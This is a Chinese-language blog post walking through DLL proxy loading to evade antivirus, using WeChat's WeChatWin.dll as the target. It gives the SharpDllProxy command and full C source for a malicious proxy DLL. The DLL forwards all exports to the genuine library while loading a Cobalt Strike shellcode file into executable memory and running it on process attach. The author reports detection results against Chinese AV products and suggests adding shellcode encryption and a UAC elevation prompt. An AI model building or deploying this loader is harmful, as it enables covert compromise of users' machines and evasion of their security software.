• DLL Proxy Loading Bypass AV


    DLL Proxy Loading Bypass AV

    前言

    感谢国外大佬开源的免杀思路,本文就是基于该文章的一次实践。

    https://redteaming.co.uk/2020/07/12/dll-proxy-loading-your-favorite-c-implant/

    原理

    具体原理请直接查看上面的文章,我就不在继续照本宣科。

    实验

    本次实战对象是微信电脑客户端-——WeChat.exe

    把该exe直接拷贝到一个单独的文件夹里,点击运行会提示缺少WeChatWin.dll,这个就是我们要进行代理的对象。

    使用cs生成bin格式的payload,用vs2019编译作者开源的工具

    工具地址:https://github.com/Flangvik/SharpDllProxy

    编译成功后,使用SharpDllProxy.dll生成一个假冒的WeChatWin.dll,执行如下命令:

    //payload.bin为cs生成的bin文件
    SharpDllProxy.exe --dll WeChatWin.dll --payload payload.bin
    

    执行成功后在

    在当前路径会生成/output_WeChatWin文件夹,里面有WeChatWin_pragma.ctmp2EF7.dll两个文件我们要用到,其中tmp2EF7.dll 即为原系统WeChatWin.dll,使用vs2019打开WeChatWin_pragma.c

    #include "pch.h"
    #include <stdio.h>
    #include <stdlib.h>
    
    #define _CRT_SECURE_NO_DEPRECATE
    #pragma warning (disable : 4996)
    
    #pragma comment(linker, "/export:??0IChannelLogWriter@@QAE@$$QAV0@@Z=tmp2EF7.??0IChannelLogWriter@@QAE@$$QAV0@@Z,@1")
    #pragma comment(linker, "/export:??0IChannelLogWriter@@QAE@ABV0@@Z=tmp2EF7.??0IChannelLogWriter@@QAE@ABV0@@Z,@2")
    #pragma comment(linker, "/export:??0IChannelLogWriter@@QAE@XZ=tmp2EF7.??0IChannelLogWriter@@QAE@XZ,@3")
    #pragma comment(linker, "/export:??4IChannelLogWriter@@QAEAAV0@$$QAV0@@Z=tmp2EF7.??4IChannelLogWriter@@QAEAAV0@$$QAV0@@Z,@4")
    #pragma comment(linker, "/export:??4IChannelLogWriter@@QAEAAV0@ABV0@@Z=tmp2EF7.??4IChannelLogWriter@@QAEAAV0@ABV0@@Z,@5")
    #pragma comment(linker, "/export:??4ILogWriter@@QAEAAV0@$$QAV0@@Z=tmp2EF7.??4ILogWriter@@QAEAAV0@$$QAV0@@Z,@6")
    #pragma comment(linker, "/export:??4ILogWriter@@QAEAAV0@ABV0@@Z=tmp2EF7.??4ILogWriter@@QAEAAV0@ABV0@@Z,@7")
    #pragma comment(linker, "/export:??_7IChannelLogWriter@@6B@=tmp2EF7.??_7IChannelLogWriter@@6B@,@8")
    #pragma comment(linker, "/export:?AddExtraMem@TXBugReport@@YAHKI@Z=tmp2EF7.?AddExtraMem@TXBugReport@@YAHKI@Z,@9")
    #pragma comment(linker, "/export:?AddExtraMem@TXBugReport@@YAHPAXI@Z=tmp2EF7.?AddExtraMem@TXBugReport@@YAHPAXI@Z,@10")
    #pragma comment(linker, "/export:?AddIgnoreHookCheckModule@TXBugReport@@YAXPB_W@Z=tmp2EF7.?AddIgnoreHookCheckModule@TXBugReport@@YAXPB_W@Z,@11")
    #pragma comment(linker, "/export:?AddReleaseMonitorPoint@TXBugReport@@YAXPAJ@Z=tmp2EF7.?AddReleaseMonitorPoint@TXBugReport@@YAXPAJ@Z,@12")
    #pragma comment(linker, "/export:?DoBugReport@TXBugReport@@YAJPAU_EXCEPTION_POINTERS@@PB_W@Z=tmp2EF7.?DoBugReport@TXBugReport@@YAJPAU_EXCEPTION_POINTERS@@PB_W@Z,@13")
    #pragma comment(linker, "/export:?GetBugReportFlag@TXBugReport@@YAKXZ=tmp2EF7.?GetBugReportFlag@TXBugReport@@YAKXZ,@14")
    #pragma comment(linker, "/export:?GetBugReportInfo@TXBugReport@@YAPAUtagBugReportInfo@1@XZ=tmp2EF7.?GetBugReportInfo@TXBugReport@@YAPAUtagBugReportInfo@1@XZ,@15")
    #pragma comment(linker, "/export:?GetCustomFiltFunc@TXBugReport@@YAP6AHPAU_EXCEPTION_POINTERS@@@ZXZ=tmp2EF7.?GetCustomFiltFunc@TXBugReport@@YAP6AHPAU_EXCEPTION_POINTERS@@@ZXZ,@16")
    #pragma comment(linker, "/export:?InitBugReport@TXBugReport@@YAXPB_W000GGKHHKKP6GHPAUtagBugReportInfo@1@PBD200PAPAXPAKPAX@Z@Z=tmp2EF7.?InitBugReport@TXBugReport@@YAXPB_W000GGKHHKKP6GHPAUtagBugReportInfo@1@PBD200PAPAXPAKPAX@Z@Z,@17")
    #pragma comment(linker, "/export:?InitBugReportEx@TXBugReport@@YAXPB_W000GGKHHKKP6GHPAUtagBugReportInfo@1@PBD200PAPAXPAKPAX@ZH@Z=tmp2EF7.?InitBugReportEx@TXBugReport@@YAXPB_W000GGKHHKKP6GHPAUtagBugReportInfo@1@PBD200PAPAXPAKPAX@ZH@Z,@18")
    #pragma comment(linker, "/export:?RaiseSelfFatalException@TXBugReport@@YAXW4SelfException@1@@Z=tmp2EF7.?RaiseSelfFatalException@TXBugReport@@YAXW4SelfException@1@@Z,@19")
    #pragma comment(linker, "/export:?RecordCallStackIfNeed@TXBugReport@@YAXPAJ@Z=tmp2EF7.?RecordCallStackIfNeed@TXBugReport@@YAXPAJ@Z,@20")
    #pragma comment(linker, "/export:?SetBugReportFlag@TXBugReport@@YAHK@Z=tmp2EF7.?SetBugReportFlag@TXBugReport@@YAHK@Z,@21")
    #pragma comment(linker, "/export:?SetBugReportPath@TXBugReport@@YAHPB_W@Z=tmp2EF7.?SetBugReportPath@TXBugReport@@YAHPB_W@Z,@22")
    #pragma comment(linker, "/export:?SetBugReportUin@TXBugReport@@YAXKH@Z=tmp2EF7.?SetBugReportUin@TXBugReport@@YAXKH@Z,@23")
    #pragma comment(linker, "/export:?SetCustomFiltFunc@TXBugReport@@YAXP6AHPAU_EXCEPTION_POINTERS@@@Z@Z=tmp2EF7.?SetCustomFiltFunc@TXBugReport@@YAXP6AHPAU_EXCEPTION_POINTERS@@@Z@Z,@24")
    #pragma comment(linker, "/export:?SetExtInfo@TXBugReport@@YAHKKPB_W@Z=tmp2EF7.?SetExtInfo@TXBugReport@@YAHKKPB_W@Z,@25")
    #pragma comment(linker, "/export:?SetExtRptFilePath@TXBugReport@@YAHPB_W0@Z=tmp2EF7.?SetExtRptFilePath@TXBugReport@@YAHPB_W0@Z,@26")
    #pragma comment(linker, "/export:?SetLogFileMd5Dir@TXBugReport@@YAHPB_W00@Z=tmp2EF7.?SetLogFileMd5Dir@TXBugReport@@YAHPB_W00@Z,@27")
    #pragma comment(linker, "/export:?UninitBugReport@TXBugReport@@YAXXZ=tmp2EF7.?UninitBugReport@TXBugReport@@YAXXZ,@28")
    #pragma comment(linker, "/export:?ValidateBugReport@TXBugReport@@YAXXZ=tmp2EF7.?ValidateBugReport@TXBugReport@@YAXXZ,@29")
    #pragma comment(linker, "/export:?pfPostBugReport@TXBugReport@@3P6AXXZA=tmp2EF7.?pfPostBugReport@TXBugReport@@3P6AXXZA,@30")
    #pragma comment(linker, "/export:?pfPreBugReport@TXBugReport@@3P6AXXZA=tmp2EF7.?pfPreBugReport@TXBugReport@@3P6AXXZA,@31")
    #pragma comment(linker, "/export:SignWith3Des=tmp2EF7.SignWith3Des,@32")
    #pragma comment(linker, "/export:StartWachat=tmp2EF7.StartWachat,@33")
    #pragma comment(linker, "/export:_TlsGetData@12=tmp2EF7._TlsGetData@12,@34")
    #pragma comment(linker, "/export:_TlsStoreData@12=tmp2EF7._TlsStoreData@12,@35")
    #pragma comment(linker, "/export:__ASSERT=tmp2EF7.__ASSERT,@36")
    
    
    DWORD WINAPI DoMagic(LPVOID lpParameter)
    {
        //https://stackoverflow.com/questions/14002954/c-programming-how-to-read-the-whole-file-contents-into-a-buffer
        FILE* fp;
        size_t size;
        unsigned char* buffer;
    
        fp = fopen("payload.bin", "rb");
        fseek(fp, 0, SEEK_END);
        size = ftell(fp);
        fseek(fp, 0, SEEK_SET);
        buffer = (unsigned char*)malloc(size);
    
        //https://ired.team/offensive-security/code-injection-process-injection/loading-and-executing-shellcode-from-portable-executable-resources
        fread(buffer, size, 1, fp);
    
        void* exec = VirtualAlloc(0, size, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    
        memcpy(exec, buffer, size);
    
        ((void(*) ())exec)();
    
        return 0;
    }
    
    BOOL APIENTRY DllMain(HMODULE hModule,
        DWORD ul_reason_for_call,
        LPVOID lpReserved
    )
    {
        HANDLE threadHandle;
    
        switch (ul_reason_for_call)
        {
        case DLL_PROCESS_ATTACH:
            // https://gist.github.com/securitytube/c956348435cc90b8e1f7
                    // Create a thread and close the handle as we do not want to use it to wait for it 
            threadHandle = CreateThread(NULL, 0, DoMagic, NULL, 0, NULL);
            CloseHandle(threadHandle);
    
        case DLL_THREAD_ATTACH:
            break;
        case DLL_THREAD_DETACH:
            break;
        case DLL_PROCESS_DETACH:
            break;
        }
        return TRUE;
    }
    

    43行前是调用原dll,46之后是调用我们之前生成的cs bin文件,并使用VirtualAlloc()函数申请内存地址然后使用CreateThread()函数执行shellcode,我们生成一个动态dll项目,然后复制代码到源文件中,编译。

    然后把红色箭头的放在一个文件夹中,运行微信客户端即可上线cs,免杀效果如下

    静态360,火绒,安全管家都不查杀,动态执行只有360查杀,另外两个无反应。

    这里还可以把shellcode直接写入上面的C文件中,然后对其进行加密解密处理,或者换一种执行方式,还可以给他加个uac认证,如果对方点是可以直接获得高权限,当然这些就不一一试验了。

  • 相关阅读:
    Android Studio 开发利器【经常使用插件】
    Eclipse改动Project的文件夹位置
    《信息检索》第8讲 毕业论文学习指导(资源及预习材料)
    Android:使用SparseArray取代HashMap优化性能
    JavaScript初探之——图片移动
    C#趣味程序---九九乘法表
    CoreData使用方法三: NSPredicate在CoreData中的使用
    Eclipse中使用正则屏蔽Logcat中的某些Tag
    给一个int型整数,如何将这个整数的奇偶位互换
    30款基本UX工具
  • 原文地址:https://www.cnblogs.com/Secde0/p/14010073.html
Copyright © 2020-2023  润新知